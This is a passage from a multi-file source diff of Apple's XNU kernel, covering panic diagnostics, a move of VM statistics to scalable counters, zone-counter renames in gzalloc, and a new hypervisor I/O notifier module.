                kdp_machine_reboot_type(kPEPanicRestartCPU, debugger_panic_options);
        }
 
@@ -1097,7 +1099,7 @@ debugger_collect_diagnostics(unsigned int exception, unsigned int code, unsigned
        if (on_device_corefile_enabled()) {
                if (!kdp_has_polled_corefile()) {
                        if (debug_boot_arg & (DB_KERN_DUMP_ON_PANIC | DB_KERN_DUMP_ON_NMI)) {
-                               paniclog_append_noflush("skipping local kernel core because core file could not be opened prior to panic (error : 0x%x)",
+                               paniclog_append_noflush("skipping local kernel core because core file could not be opened prior to panic (error : 0x%x)\n",
                                    kdp_polled_corefile_error());
 #if defined(__arm__) || defined(__arm64__)
                                panic_info->eph_panic_flags |= EMBEDDED_PANIC_HEADER_FLAG_COREDUMP_FAILED;
@@ -1112,7 +1114,7 @@ debugger_collect_diagnostics(unsigned int exception, unsigned int code, unsigned
                }
 #if XNU_MONITOR
                else if ((pmap_get_cpu_data()->ppl_state == PPL_STATE_PANIC) && (debug_boot_arg & (DB_KERN_DUMP_ON_PANIC | DB_KERN_DUMP_ON_NMI))) {
-                       paniclog_append_noflush("skipping local kernel core because the PPL is in PANIC state");
+                       paniclog_append_noflush("skipping local kernel core because the PPL is in PANIC state\n");
                        panic_info->eph_panic_flags |= EMBEDDED_PANIC_HEADER_FLAG_COREDUMP_FAILED;
                        paniclog_flush();
                }
@@ -1145,11 +1147,17 @@ debugger_collect_diagnostics(unsigned int exception, unsigned int code, unsigned
                         */
                        if ((debug_boot_arg & DB_REBOOT_POST_CORE) &&
                            ((ret == 0) || (debugger_panic_options & DEBUGGER_OPTION_ATTEMPTCOREDUMPANDREBOOT))) {
+                               PEHaltRestart(kPEPanicDiagnosticsDone);
                                kdp_machine_reboot_type(kPEPanicRestartCPU, debugger_panic_options);
                        }
                }
        }
 
+       if (debugger_current_op == DBOP_PANIC ||
+           ((debugger_current_op == DBOP_DEBUGGER) && debugger_is_panic)) {
+               PEHaltRestart(kPEPanicDiagnosticsDone);
+       }
+
        if (debug_boot_arg & DB_REBOOT_ALWAYS) {
                kdp_machine_reboot_type(kPEPanicRestartCPU, debugger_panic_options);
        }
@@ -1179,6 +1187,11 @@ debugger_collect_diagnostics(unsigned int exception, unsigned int code, unsigned
                panic_spin_shmcon();
        }
 #endif /* defined(__arm__) || defined(__arm64__) */
+
+#else /* CONFIG_KDP_INTERACTIVE_DEBUGGING */
+
+       PEHaltRestart(kPEPanicDiagnosticsDone);
+
 #endif /* CONFIG_KDP_INTERACTIVE_DEBUGGING */
 
        if (!panicDebugging) {
@@ -1565,10 +1578,6 @@ extern unsigned int     inuse_ptepages_count;
 extern long long alloc_ptepages_count;
 #endif
 
-extern boolean_t panic_include_zprint;
-extern mach_memory_info_t *panic_kext_memory_info;
-extern vm_size_t panic_kext_memory_size;
-
 __private_extern__ void
 panic_display_zprint(void)
 {
@@ -1579,10 +1588,10 @@ panic_display_zprint(void)
                zone_index_foreach(i) {
                        if (ml_nofault_copy((vm_offset_t)&zone_array[i],
                            (vm_offset_t)&zone_copy, sizeof(struct zone)) == sizeof(struct zone)) {
-                               if (zone_copy.page_count > atop(1024 * 1024)) {
+                               if (zone_copy.z_wired_cur > atop(1024 * 1024)) {
                                        paniclog_append_noflush("%-8s%-20s %10llu %10lu\n",
                                            zone_heap_name(&zone_copy),
-                                           zone_copy.z_name, ptoa_64(zone_copy.page_count),
+                                           zone_copy.z_name, (uint64_t)zone_size_wired(&zone_copy),
                                            (uintptr_t)zone_size_free(&zone_copy));
                                }
                        }
@@ -1623,8 +1632,6 @@ panic_display_ecc_errors(void)
 #endif /* CONFIG_ECC_LOGGING */
 
 #if CONFIG_ZLEAKS
-extern boolean_t        panic_include_ztrace;
-extern struct ztrace* top_ztrace;
 void panic_print_symbol_name(vm_address_t search);
 
 /*
index fe3d5eed2e0d069209356daae34b081cf858b538..c9550cfd7e45124e053528c540fc30bb9795c7d1 100644 (file)
@@ -286,6 +286,7 @@ __options_decl(microstackshot_flags_t, uint32_t, {
 #define KF_INTERRUPT_MASKED_DEBUG_OVRD (0x40)
 #define KF_TRAPTRACE_OVRD (0x80)
 #define KF_IOTRACE_OVRD (0x100)
+#define KF_INTERRUPT_MASKED_DEBUG_STACKSHOT_OVRD (0x200)
 
 boolean_t kern_feature_override(uint32_t fmask);
 
index 91c688db5899675cd2a82cf311af6d5bf2923faa..2060dc2a15b31d35ee0971884d66a1a80712c57a 100644 (file)
@@ -76,7 +76,6 @@
 #include <ipc/ipc_pset.h>
 #include <ipc/ipc_machdep.h>
 
-#include <kern/counters.h>
 #include <kern/ipc_tt.h>
 #include <kern/task.h>
 #include <kern/thread.h>
index ff7dec6bcddc781e46f3ebddb61674ad90e60a4b..54ec12be25c702b806c247de3ff9dc7fa2f79cf5 100644 (file)
@@ -204,11 +204,11 @@ gzalloc_empty_free_cache(zone_t zone)
        }
 
        /* Reset gzalloc_data. */
-       lock_zone(zone);
+       zone_lock(zone);
        memcpy((void *)gzfc_copy, (void *)zone->gz.gzfc, gzfcsz);
        bzero((void *)zone->gz.gzfc, gzfcsz);
        zone->gz.gzfc_index = 0;
-       unlock_zone(zone);
+       zone_unlock(zone);
 
        /* Free up all the cached elements. */
        for (uint32_t index = 0; index < gzfc_size; index++) {
@@ -233,10 +233,10 @@ gzalloc_empty_free_cache(zone_t zone)
         */
 
        /* Decrement zone counters. */
-       lock_zone(zone);
-       zone->countfree += freed_elements;
-       zone->page_count -= freed_elements;
-       unlock_zone(zone);
+       zone_lock(zone);
+       zone->z_elems_free += freed_elements;
+       zone->z_wired_cur -= freed_elements;
+       zone_unlock(zone);
 
        kmem_free(kernel_map, gzfc_copy, gzfcsz);
 }
@@ -357,6 +357,7 @@ gzalloc_alloc(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags)
        vm_offset_t residue = rounded_size - zone_elem_size(zone);
        vm_offset_t gzaddr = 0;
        gzhdr_t *gzh, *gzhcopy = NULL;
+       bool new_va = false;
 
        if (!kmem_ready || (vm_page_zone == ZONE_NULL)) {
                /* Early allocations are supplied directly from the
@@ -381,6 +382,7 @@ gzalloc_alloc(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags)
                        panic("gzalloc: kernel_memory_allocate for size 0x%llx failed with %d",
                            (uint64_t)rounded_size, kr);
                }
+               new_va = true;
        }
 
        if (gzalloc_uf_mode) {
@@ -396,7 +398,7 @@ gzalloc_alloc(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags)
                addr = (gzaddr + residue);
        }
 
-       if (zone->zfree_clear_mem) {
+       if (zone->z_free_zeroes) {
                bzero((void *)gzaddr, rounded_size);
        } else {
                /* Fill with a pattern on allocation to trap uninitialized
@@ -424,15 +426,15 @@ gzalloc_alloc(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags)
                *gzhcopy = *gzh;
        }
 
-       lock_zone(zone);
+       zone_lock(zone);
        assert(zone->z_self == zone);
-       zone->countfree--;
-       zone->page_count += 1;
+       zone->z_elems_free--;
+       if (new_va) {
+               zone->z_va_cur += 1;
+       }
+       zone->z_wired_cur += 1;
        zpercpu_get(zstats)->zs_mem_allocated += rounded_size;
-#if ZALLOC_DETAILED_STATS
-       zpercpu_get(zstats)->zs_mem_wasted += rounded_size - zone_elem_size(zone);
-#endif /* ZALLOC_DETAILED_STATS */
-       unlock_zone(zone);
+       zone_unlock(zone);
 
        OSAddAtomic64((SInt32) rounded_size, &gzalloc_allocated);
        OSAddAtomic64((SInt32) (rounded_size - zone_elem_size(zone)), &gzalloc_wasted);
@@ -468,7 +470,7 @@ gzalloc_free(zone_t zone, zone_stats_t zstats, void *addr)
        }
 
        if (gzfc_size && gzalloc_dfree_check) {
-               lock_zone(zone);
+               zone_lock(zone);
                assert(zone->z_self == zone);
                for (uint32_t gd = 0; gd < gzfc_size; gd++) {
                        if (zone->gz.gzfc[gd] != saddr) {
@@ -478,7 +480,7 @@ gzalloc_free(zone_t zone, zone_stats_t zstats, void *addr)
                            "current free cache index: %d, freed index: %d",
                            __func__, saddr, zone->gz.gzfc_index, gd);
                }
-               unlock_zone(zone);
+               zone_unlock(zone);
        }
 
        if (gzalloc_consistency_checks) {
@@ -549,7 +551,7 @@ gzalloc_free(zone_t zone, zone_stats_t zstats, void *addr)
                free_addr = saddr;
        }
 
-       lock_zone(zone);
+       zone_lock(zone);
        assert(zone->z_self == zone);
 
        /* Insert newly freed element into the protected free element
@@ -564,12 +566,12 @@ gzalloc_free(zone_t zone, zone_stats_t zstats, void *addr)
        }
 
        if (free_addr) {
-               zone->countfree++;
-               zone->page_count -= 1;
+               zone->z_elems_free++;
+               zone->z_wired_cur -= 1;
        }
 
        zpercpu_get(zstats)->zs_mem_freed += rounded_size;
-       unlock_zone(zone);
+       zone_unlock(zone);
 
        if (free_addr) {
                // TODO: consider using physical reads to check for
index 5b60219f7d3ec52c9ed02537129d0a396c8478e5..12a061aa5ab610778412bfc994b9365acf14a978 100644 (file)
 
 #include <pexpert/pexpert.h>
 
-vm_statistics64_data_t PERCPU_DATA(vm_stat);
-uint64_t PERCPU_DATA(vm_page_grab_count);
+SCALABLE_COUNTER_DEFINE(vm_statistics_zero_fill_count);        /* # of zero fill pages */
+SCALABLE_COUNTER_DEFINE(vm_statistics_reactivations);          /* # of pages reactivated */
+SCALABLE_COUNTER_DEFINE(vm_statistics_pageins);                /* # of pageins */
+SCALABLE_COUNTER_DEFINE(vm_statistics_pageouts);               /* # of pageouts */
+SCALABLE_COUNTER_DEFINE(vm_statistics_faults);                 /* # of faults */
+SCALABLE_COUNTER_DEFINE(vm_statistics_cow_faults);             /* # of copy-on-writes */
+SCALABLE_COUNTER_DEFINE(vm_statistics_lookups);                /* object cache lookups */
+SCALABLE_COUNTER_DEFINE(vm_statistics_hits);                   /* object cache hits */
+SCALABLE_COUNTER_DEFINE(vm_statistics_purges);                 /* # of pages purged */
+SCALABLE_COUNTER_DEFINE(vm_statistics_decompressions);         /* # of pages decompressed */
+SCALABLE_COUNTER_DEFINE(vm_statistics_compressions);           /* # of pages compressed */
+SCALABLE_COUNTER_DEFINE(vm_statistics_swapins);                /* # of pages swapped in (via compression segments) */
+SCALABLE_COUNTER_DEFINE(vm_statistics_swapouts);               /* # of pages swapped out (via compression segments) */
+SCALABLE_COUNTER_DEFINE(vm_statistics_total_uncompressed_pages_in_compressor); /* # of pages (uncompressed) held within the compressor. */
+SCALABLE_COUNTER_DEFINE(vm_page_grab_count);
 
 host_data_t realhost;
 
+static void
+get_host_vm_stats(vm_statistics64_t out)
+{
+       out->zero_fill_count = counter_load(&vm_statistics_zero_fill_count);
+       out->reactivations = counter_load(&vm_statistics_reactivations);
+       out->pageins = counter_load(&vm_statistics_pageins);
+       out->pageouts = counter_load(&vm_statistics_pageouts);
+       out->faults = counter_load(&vm_statistics_faults);
+       out->cow_faults = counter_load(&vm_statistics_cow_faults);
+       out->lookups = counter_load(&vm_statistics_lookups);
+       out->hits = counter_load(&vm_statistics_hits);
+       out->compressions = counter_load(&vm_statistics_compressions);
+       out->decompressions = counter_load(&vm_statistics_decompressions);
+       out->swapins = counter_load(&vm_statistics_swapins);
+       out->swapouts = counter_load(&vm_statistics_swapouts);
+}
 vm_extmod_statistics_data_t host_extmod_statistics;
 
 kern_return_t
@@ -123,8 +152,6 @@ host_processors(host_priv_t host_priv, processor_array_t * out_array, mach_msg_t
                return KERN_INVALID_ARGUMENT;
        }
 
-       assert(host_priv == &realhost);
-
        unsigned int count = processor_count;
        assert(count != 0);
 
@@ -402,19 +429,7 @@ host_statistics(host_t host, host_flavor_t flavor, host_info_t info, mach_msg_ty
                        return KERN_FAILURE;
                }
 
-               host_vm_stat = *PERCPU_GET_MASTER(vm_stat);
-
-               percpu_foreach_secondary(stat, vm_stat) {
-                       vm_statistics64_data_t data = *stat;
-                       host_vm_stat.zero_fill_count += data.zero_fill_count;
-                       host_vm_stat.reactivations += data.reactivations;
-                       host_vm_stat.pageins += data.pageins;
-                       host_vm_stat.pageouts += data.pageouts;
-                       host_vm_stat.faults += data.faults;
-                       host_vm_stat.cow_faults += data.cow_faults;
-                       host_vm_stat.lookups += data.lookups;
-                       host_vm_stat.hits += data.hits;
-               }
+               get_host_vm_stats(&host_vm_stat);
 
                stat32 = (vm_statistics_t)info;
 
@@ -427,11 +442,11 @@ host_statistics(host_t host, host_flavor_t flavor, host_info_t info, mach_msg_ty
                        }
                }
                stat32->inactive_count = VM_STATISTICS_TRUNCATE_TO_32_BIT(vm_page_inactive_count);
-#if CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
                stat32->wire_count = VM_STATISTICS_TRUNCATE_TO_32_BIT(vm_page_wire_count);
-#else
+#else /* !XNU_TARGET_OS_OSX */
                stat32->wire_count = VM_STATISTICS_TRUNCATE_TO_32_BIT(vm_page_wire_count + vm_page_throttled_count + vm_lopage_free_count);
-#endif
+#endif /* !XNU_TARGET_OS_OSX */
                stat32->zero_fill_count = VM_STATISTICS_TRUNCATE_TO_32_BIT(host_vm_stat.zero_fill_count);
                stat32->reactivations = VM_STATISTICS_TRUNCATE_TO_32_BIT(host_vm_stat.reactivations);
                stat32->pageins = VM_STATISTICS_TRUNCATE_TO_32_BIT(host_vm_stat.pageins);
@@ -793,24 +808,7 @@ vm_stats(void *info, unsigned int *count)
        if (*count < HOST_VM_INFO64_REV0_COUNT) {
                return KERN_FAILURE;
        }
-
-       host_vm_stat = *PERCPU_GET_MASTER(vm_stat);
-
-       percpu_foreach_secondary(stat, vm_stat) {
-               vm_statistics64_data_t data = *stat;
-               host_vm_stat.zero_fill_count += data.zero_fill_count;
-               host_vm_stat.reactivations += data.reactivations;
-               host_vm_stat.pageins += data.pageins;
-               host_vm_stat.pageouts += data.pageouts;
-               host_vm_stat.faults += data.faults;
-               host_vm_stat.cow_faults += data.cow_faults;
-               host_vm_stat.lookups += data.lookups;
-               host_vm_stat.hits += data.hits;
-               host_vm_stat.compressions += data.compressions;
-               host_vm_stat.decompressions += data.decompressions;
-               host_vm_stat.swapins += data.swapins;
-               host_vm_stat.swapouts += data.swapouts;
-       }
+       get_host_vm_stats(&host_vm_stat);
 
        vm_statistics64_t stat = (vm_statistics64_t)info;
 
@@ -827,11 +825,11 @@ vm_stats(void *info, unsigned int *count)
                }
        }
        stat->inactive_count = vm_page_inactive_count;
-#if CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
        stat->wire_count = vm_page_wire_count;
-#else
+#else /* !XNU_TARGET_OS_OSX */
        stat->wire_count = vm_page_wire_count + vm_page_throttled_count + vm_lopage_free_count;
-#endif
+#endif /* !XNU_TARGET_OS_OSX */
        stat->zero_fill_count = host_vm_stat.zero_fill_count;
        stat->reactivations = host_vm_stat.reactivations;
        stat->pageins = host_vm_stat.pageins;
@@ -981,20 +979,6 @@ set_sched_stats_active(boolean_t active)
        return KERN_SUCCESS;
 }
 
-
-uint64_t
-get_pages_grabbed_count(void)
-{
-       uint64_t pages_grabbed_count = 0;
-
-       percpu_foreach(count, vm_page_grab_count) {
-               pages_grabbed_count += *count;
-       }
-
-       return pages_grabbed_count;
-}
-
-
 kern_return_t
 get_sched_statistics(struct _processor_statistics_np * out, uint32_t * count)
 {
@@ -1290,6 +1274,10 @@ host_set_special_port_from_user(host_priv_t host_priv, int id, ipc_port_t port)
                return KERN_NO_ACCESS;
        }
 
+       if (IP_VALID(port) && (port->ip_immovable_receive || port->ip_immovable_send)) {
+               return KERN_INVALID_RIGHT;
+       }
+
        return host_set_special_port(host_priv, id, port);
 }
 
@@ -1415,8 +1403,6 @@ host_set_multiuser_config_flags(host_priv_t host_priv, uint32_t multiuser_config
                return KERN_INVALID_ARGUMENT;
        }
 
-       assert(host_priv == &realhost);
-
        /*
         * Always enforce that the multiuser bit is set
         * if a value is written to the commpage word.
index 9d21a4a4c4534d6807dbe3692a96c07b3365a0f5..d6e12f31f7cad4ef93cbe280e64b6e9e227fa8dc 100644 (file)
 #ifndef _KERN_HOST_STATISTICS_H_
 #define _KERN_HOST_STATISTICS_H_
 
-#include <libkern/OSAtomic.h>
-#include <mach/vm_statistics.h>
-#include <kern/percpu.h>
-#include <os/atomic_private.h>
+#include <kern/counter.h>
 
-extern
-uint64_t get_pages_grabbed_count(void);
+SCALABLE_COUNTER_DECLARE(vm_statistics_zero_fill_count);        /* # of zero fill pages */
+SCALABLE_COUNTER_DECLARE(vm_statistics_reactivations);          /* # of pages reactivated */
+SCALABLE_COUNTER_DECLARE(vm_statistics_pageins);                /* # of pageins */
+SCALABLE_COUNTER_DECLARE(vm_statistics_pageouts);               /* # of pageouts */
+SCALABLE_COUNTER_DECLARE(vm_statistics_faults);                 /* # of faults */
+SCALABLE_COUNTER_DECLARE(vm_statistics_cow_faults);             /* # of copy-on-writes */
+SCALABLE_COUNTER_DECLARE(vm_statistics_lookups);                /* object cache lookups */
+SCALABLE_COUNTER_DECLARE(vm_statistics_hits);                   /* object cache hits */
+SCALABLE_COUNTER_DECLARE(vm_statistics_purges);                 /* # of pages purged */
+SCALABLE_COUNTER_DECLARE(vm_statistics_decompressions);         /* # of pages decompressed */
+SCALABLE_COUNTER_DECLARE(vm_statistics_compressions);           /* # of pages compressed */
+SCALABLE_COUNTER_DECLARE(vm_statistics_swapins);                /* # of pages swapped in (via compression segments) */
+SCALABLE_COUNTER_DECLARE(vm_statistics_swapouts);               /* # of pages swapped out (via compression segments) */
+SCALABLE_COUNTER_DECLARE(vm_statistics_total_uncompressed_pages_in_compressor); /* # of pages (uncompressed) held within the compressor. */
 
-PERCPU_DECL(vm_statistics64_data_t, vm_stat);
-PERCPU_DECL(uint64_t, vm_page_grab_count);
-
-#define VM_STAT_INCR(event)                                             \
-MACRO_BEGIN                                                             \
-       os_atomic_inc(&PERCPU_GET(vm_stat)->event, relaxed);            \
-MACRO_END
-
-#define VM_STAT_INCR_BY(event, amount)                                  \
-MACRO_BEGIN                                                             \
-       os_atomic_add(&PERCPU_GET(vm_stat)->event, amount, relaxed);    \
-MACRO_END
+SCALABLE_COUNTER_DECLARE(vm_page_grab_count);
 
 #endif  /* _KERN_HOST_STATISTICS_H_ */
diff --git a/osfmk/kern/hv_io_notifier.c b/osfmk/kern/hv_io_notifier.c
new file mode 100644 (file)
index 0000000..7f0938f
--- /dev/null
@@ -0,0 +1,274 @@
+/*
+ * Copyright (c) 2020 Apple Inc. All rights reserved.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
+ *
+ * This file contains Original Code and/or Modifications of Original Code
+ * as defined in and that are subject to the Apple Public Source License
+ * Version 2.0 (the 'License'). You may not use this file except in
+ * compliance with the License. The rights granted to you under the License
+ * may not be used to create, or enable the creation or redistribution of,
+ * unlawful or unlicensed copies of an Apple operating system, or to
+ * circumvent, violate, or enable the circumvention or violation of, any
+ * terms of an Apple operating system software license agreement.
+ *
+ * Please obtain a copy of the License at
+ * http://www.opensource.apple.com/apsl/ and read it before using this file.
+ *
+ * The Original Code and all software distributed under the License are
+ * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
+ * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+ * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+ * Please see the License for the specific language governing rights and
+ * limitations under the License.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
+ */
+
+#include <kern/hv_support.h>
+#include <kern/ipc_mig.h>
+#include <kern/kalloc.h>
+#include <kern/locks.h>
+#include <mach/port.h>
+#include <sys/queue.h>
+#include <ipc/ipc_port.h>
+
+#include <stdbool.h>
+
+#include "hv_io_notifier.h"
+
+static LCK_GRP_DECLARE(ion_lock_grp, "io notifier");
+
+typedef struct hv_ion_entry {
+       LIST_ENTRY(hv_ion_entry) list;
+
+       uint64_t           addr;
+       size_t             size;
+       uint64_t           value;
+       uint32_t           flags;
+
+       mach_port_t        port;
+       mach_port_name_t   port_name;
+} hv_ion_entry_t;
+
+LIST_HEAD(io_notifier_list, hv_ion_entry);
+
+struct hv_ion_grp {
+       struct io_notifier_list list;
+       lck_rw_t lock;
+};
+
+/*
+ * Lookup a matching notifier and return it.
+ */
+static hv_ion_entry_t *
+hv_io_notifier_grp_lookup(const hv_ion_grp_t *grp, const hv_ion_entry_t *key)
+{
+       hv_ion_entry_t *ion = NULL;
+
+       LIST_FOREACH(ion, &grp->list, list) {
+               if (ion->addr != key->addr) {
+                       continue;
+               }
+
+               if (!(ion->flags & kHV_ION_ANY_SIZE) && ion->size != key->size) {
+                       continue;
+               }
+
+               if (!(ion->flags & kHV_ION_ANY_VALUE) && ion->value != key->value) {
+                       continue;
+               }
+
+               if (ion->port_name != key->port_name) {
+                       continue;
+               }
+
+               if (ion->flags != key->flags) {
+                       continue;
+               }
+
+               return ion;
+       }
+
+       return NULL;
+}
+
+/*
+ * Add a new notifier.
+ * Return KERN_SUCCESS if the notifier was added, an error otherwise.
+ */
+kern_return_t
+hv_io_notifier_grp_add(hv_ion_grp_t *grp, const hv_ion_t *notifier)
+{
+       hv_ion_entry_t *ion = NULL;
+
+       ion = kalloc(sizeof(*ion));
+       if (ion == NULL) {
+               return KERN_RESOURCE_SHORTAGE;
+       }
+
+       ion->addr = notifier->addr;
+       ion->size = notifier->size;
+       ion->value = notifier->value;
+       ion->flags = notifier->flags;
+       ion->port_name = notifier->port_name;
+
+       kern_return_t ret = ipc_object_copyin(current_task()->itk_space,
+           ion->port_name, MACH_MSG_TYPE_COPY_SEND, (ipc_object_t *)&ion->port, 0,
+           NULL, IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND);
+       if (ret != KERN_SUCCESS) {
+               kfree(ion, sizeof(*ion));
+               return ret;
+       }
+
+       lck_rw_lock_exclusive(&grp->lock);
+
+       if (hv_io_notifier_grp_lookup(grp, ion) != NULL) {
+               lck_rw_done(&grp->lock);
+               ipc_port_release_send(ion->port);
+               kfree(ion, sizeof(*ion));
+               return KERN_FAILURE;
+       }
+
+       LIST_INSERT_HEAD(&grp->list, ion, list);
+
+       lck_rw_done(&grp->lock);
+
+       return KERN_SUCCESS;
+}
+
+/*
+ * Remove and free a notifier.
+ * Return KERN_SUCCESS if the notifier was removed, an error otherwise.
+ */
+kern_return_t
+hv_io_notifier_grp_remove(hv_ion_grp_t *grp, const hv_ion_t *notifier)
+{
+       hv_ion_entry_t ion = {};
+       hv_ion_entry_t *entry = NULL;
+
+       ion.addr = notifier->addr;
+       ion.size = notifier->size;
+       ion.value = notifier->value;
+       ion.flags = notifier->flags;
+       ion.port_name = notifier->port_name;
+
+       lck_rw_lock_exclusive(&grp->lock);
+
+       entry = hv_io_notifier_grp_lookup(grp, &ion);
+       if (entry == NULL) {
+               lck_rw_done(&grp->lock);
+               return KERN_FAILURE;
+       }
+
+       LIST_REMOVE(entry, list);
+
+       lck_rw_done(&grp->lock);
+
+       ipc_port_release_send(entry->port);
+       kfree(entry, sizeof(*entry));
+
+       return KERN_SUCCESS;
+}
+
+/*
+ * Find matching notifiers and notify the port.
+ * Returns KERN_SUCCESS if no errors occurred when sending notifications and at
+ * least one notification was sent.
+ */
+kern_return_t
+hv_io_notifier_grp_fire(hv_ion_grp_t *grp, uint64_t addr, size_t size,
+    uint64_t value)
+{
+       kern_return_t kr = KERN_FAILURE;
+       hv_ion_entry_t *ion = NULL;
+       bool fired = false;
+
+       lck_rw_lock_shared(&grp->lock);
+
+       LIST_FOREACH(ion, &grp->list, list) {
+               if (ion->addr != addr) {
+                       continue;
+               }
+
+               if (!(ion->flags & kHV_ION_ANY_SIZE) && ion->size != size) {
+                       continue;
+               }
+
+               if (!(ion->flags & kHV_ION_ANY_VALUE) && ion->value != value) {
+                       continue;
+               }
+
+               hv_ion_message_t msg = {
+                       .header.msgh_bits         = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0),
+                       .header.msgh_size         = sizeof(msg),
+                       .header.msgh_remote_port  = ion->port,
+                       .header.msgh_local_port   = MACH_PORT_NULL,
+                       .header.msgh_voucher_port = MACH_PORT_NULL,
+                       .header.msgh_id           = 0,
+
+                       .addr = addr,
+                       .size = size,
+                       .value = value,
+               };
+
+               kr = mach_msg_send_from_kernel_with_options(&msg.header, sizeof(msg),
+                   MACH_SEND_TIMEOUT, MACH_MSG_TIMEOUT_NONE);
+
+               /*
+                * A timeout will occur when the queue is full. Ignore it if so
+                * configured.
+                */
+               if (kr == MACH_SEND_TIMED_OUT && !(ion->flags & kHV_ION_EXIT_FULL)) {
+                       kr = MACH_MSG_SUCCESS;
+               }
+
+               if (kr != MACH_MSG_SUCCESS) {
+                       fired = false;
+                       break;
+               }
+
+               fired = true;
+       }
+
+       lck_rw_done(&grp->lock);
+       return fired ? KERN_SUCCESS : KERN_FAILURE;
+}
+
+kern_return_t
+hv_io_notifier_grp_alloc(hv_ion_grp_t **grp_p )
+{
+       hv_ion_grp_t *grp = kalloc(sizeof(*grp));
+
+       if (grp == NULL) {
+               return KERN_RESOURCE_SHORTAGE;
+       }
+       bzero(grp, sizeof(*grp));
+
+       lck_rw_init(&grp->lock, &ion_lock_grp, LCK_ATTR_NULL);
+
+       *grp_p = grp;
+       return KERN_SUCCESS;
+}
+
+void
+hv_io_notifier_grp_free(hv_ion_grp_t **grp_p)
+{
+       hv_ion_grp_t *grp = *grp_p;
+
+       while (!LIST_EMPTY(&grp->list)) {
+               hv_ion_entry_t *ion = LIST_FIRST(&grp->list);
+
+               LIST_REMOVE(ion, list);
+
+               ipc_port_release_send(ion->port);
+               kfree(ion, sizeof(*ion));
+       }
+
+       lck_rw_destroy(&grp->lock, &ion_lock_grp);
+
+       kfree(grp, sizeof(*grp));
+
+       *grp_p = NULL;
+}
diff --git a/osfmk/kern/hv_io_notifier.h b/osfmk/kern/hv_io_notifier.h
new file mode 100644 (file)
index 0000000..cd50a3f
--- /dev/null
@@ -0,0 +1,74 @@
+/*
+ * Copyright (c) 2020 Apple Inc. All rights reserved.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
+ *
+ * This file contains Original Code and/or Modifications of Original Code
+ * as defined in and that are subject to the Apple Public Source License
+ * Version 2.0 (the 'License'). You may not use this file except in
+ * compliance with the License. The rights granted to you under the License
+ * may not be used to create, or enable the creation or redistribution of,
+ * unlawful or unlicensed copies of an Apple operating system, or to
+ * circumvent, violate, or enable the circumvention or violation of, any
+ * terms of an Apple operating system software license agreement.
+ *
+ * Please obtain a copy of the License at
+ * http://www.opensource.apple.com/apsl/ and read it before using this file.
+ *
+ * The Original Code and all software distributed under the License are
+ * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
+ * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+ * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+ * Please see the License for the specific language governing rights and
+ * limitations under the License.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
+ */
+
+#pragma once
+
+#include <mach/port.h>
+#include <stdint.h>
+
+#ifdef __cplusplus
+extern "C" {
+#endif
+
+enum {
+       kHV_ION_NONE             = (0u << 0),
+       kHV_ION_ANY_VALUE        = (1u << 1),
+       kHV_ION_ANY_SIZE         = (1u << 2),
+       kHV_ION_EXIT_FULL        = (1u << 3),
+};
+
+#ifdef KERNEL_PRIVATE
+
+typedef struct {
+       mach_msg_header_t header;
+       uint64_t addr;
+       uint64_t size;
+       uint64_t value;
+} hv_ion_message_t;
+
+typedef struct {
+       uint64_t addr;
+       uint64_t size;
+       uint64_t value;
+       uint32_t port_name;
+       uint32_t flags;
+} hv_ion_t;
+
+typedef struct hv_ion_grp hv_ion_grp_t;
+
+extern kern_return_t hv_io_notifier_grp_add(hv_ion_grp_t *grp, const hv_ion_t *);
+extern kern_return_t hv_io_notifier_grp_remove(hv_ion_grp_t *, const hv_ion_t *);
+extern kern_return_t hv_io_notifier_grp_fire(hv_ion_grp_t *, uint64_t, size_t, uint64_t);
+extern kern_return_t hv_io_notifier_grp_alloc(hv_ion_grp_t **);
+extern void hv_io_notifier_grp_free(hv_ion_grp_t **);
+
+#endif /* KERNEL_PRIVATE */
+
+#ifdef __cplusplus
+}
+#endif
index ca9054202bfd90b91cdb21480e5507d77f4fcac9..39ef71694d6ed86a8ab71f2833d0ddeab08008dd 100644 (file)
@@ -33,6 +33,7 @@
 #include <libkern/OSAtomic.h>
 #include <vm/vm_pageout.h>
 #include <mach/sdt.h>
+#include <sys/kdebug.h>
 
 #if defined(__x86_64__) && CONFIG_VMX
 #include <i386/vmx/vmx_cpu.h>
@@ -52,6 +53,8 @@ hv_callbacks_t hv_callbacks = {
        .thread_destroy = NULL, /* thread is being destroyed */
        .task_destroy = NULL,   /* task is being destroyed */
        .volatile_state = NULL, /* thread state is becoming volatile */
+       .resume = NULL,         /* system is being resumed */
+       .memory_pressure = NULL,/* (unused) */
 };
 
 /* trap tables for hv_*_trap syscalls */
@@ -192,7 +195,8 @@ hv_release_callbacks(void)
                .suspend = NULL,
                .thread_destroy = NULL,
                .task_destroy = NULL,
-               .volatile_state = NULL
+               .volatile_state = NULL,
+               .resume = NULL,
        };
 
        hv_callbacks_enabled = 0;
@@ -208,6 +212,15 @@ hv_suspend(void)
        }
 }
 
+/* system resume notification */
+void
+hv_resume(void)
+{
+       if (hv_callbacks_enabled && hv_callbacks.resume) {
+               hv_callbacks.resume();
+       }
+}
+
 /* dispatch hv_task_trap/hv_thread_trap syscalls to trap handlers,
